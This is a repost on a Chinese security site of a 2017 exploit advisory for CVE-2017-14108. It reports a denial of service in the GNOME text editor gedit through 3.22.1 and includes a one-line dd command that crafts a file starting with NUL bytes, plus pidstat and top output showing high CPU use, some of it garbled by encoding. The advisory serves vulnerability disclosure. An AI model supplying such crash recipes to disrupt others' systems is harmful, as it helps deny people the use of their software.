首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
libgedit.a 3.22.1 Denial Of Service
来源:hosein.askari@aol.com 作者:Askari 发布时间:2017-09-05  
whom it may concern,
################

#Title: libgedit.a mishandeling NUL blocks in gedit(GNOME text editor) | Denial of service

#CVE: CVE-2017-14108

#CWE: CWE-400

#Exploit Author: Hosein Askari 

#Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit

#Version : All Version (3.22.1 and older version)

#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)

#Date: 02-09-2017

#Category: Application

#Author Mail : hosein.askari@aol.com

#Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) for a longtime via a file(less than 100KB) that begins with many '\0' characters.

###############

#sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt

#################

POC:

constantine@constantine:~$ pidstat -h -r -u -v -p 3107

Linux 4.4.0-93-generic (constantine) A A A  U+-U*/UdegU1/UdegU+- A A A  _i686_A A A  (2 CPU)

#A A A A A  TimeA A  UIDA A A A A A  PIDA A A  %usr %systemA  %guestA A  %waitA A A  %CPUA A  CPUA  minflt/sA  majflt/sA A A A  VSZA A A A  RSSA A  %MEM threadsA A  fd-nrA  Command

A 1504280041A  1000A A A A A  3107A A  16.43A A A  0.01A A A  0.00A A A  0.03A A  106.44A A A A  1A A A A  15.53A A A A A  0.00A  121296A A  38804A A  0.95A A A A A A  4A A A A A  18A  gedit

constantine@constantine:~$ top

A  PID USERA A A A A  PRA  NIA A A  VIRTA A A  RESA A A  SHR SA  %CPU %MEMA A A A  TIME+ COMMANDA A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A  

A 3107 constan+A  20A A  0A  128884A  38492A  28320 R 106.7A  0.9A A  0:17.76 gedit 

#########################
Best Regards

Hosein Askari

Contact : hosein.askari@aol.com

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·USB Safely Remove 5.5.5 Denial
·IBM Notes 8.5.x/9.0.x - Denial
·IBM Notes 8.5.x/9.0.x - Denial
·Dup Scout Enterprise 9.9.14 -
·NEC EXPRESS CLUSTER clpwebmc R
·Malicious Git HTTP Server For
·Mongoose Web Server 6.5 - Cros
·VX Search Enterprise 10.0.14 B
·Jungo DriverWizard WinDriver -
·Easy Vedio to PSP Converter 1.
·Jungo DriverWizard WinDriver -
·QNAP Transcode Server Command
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved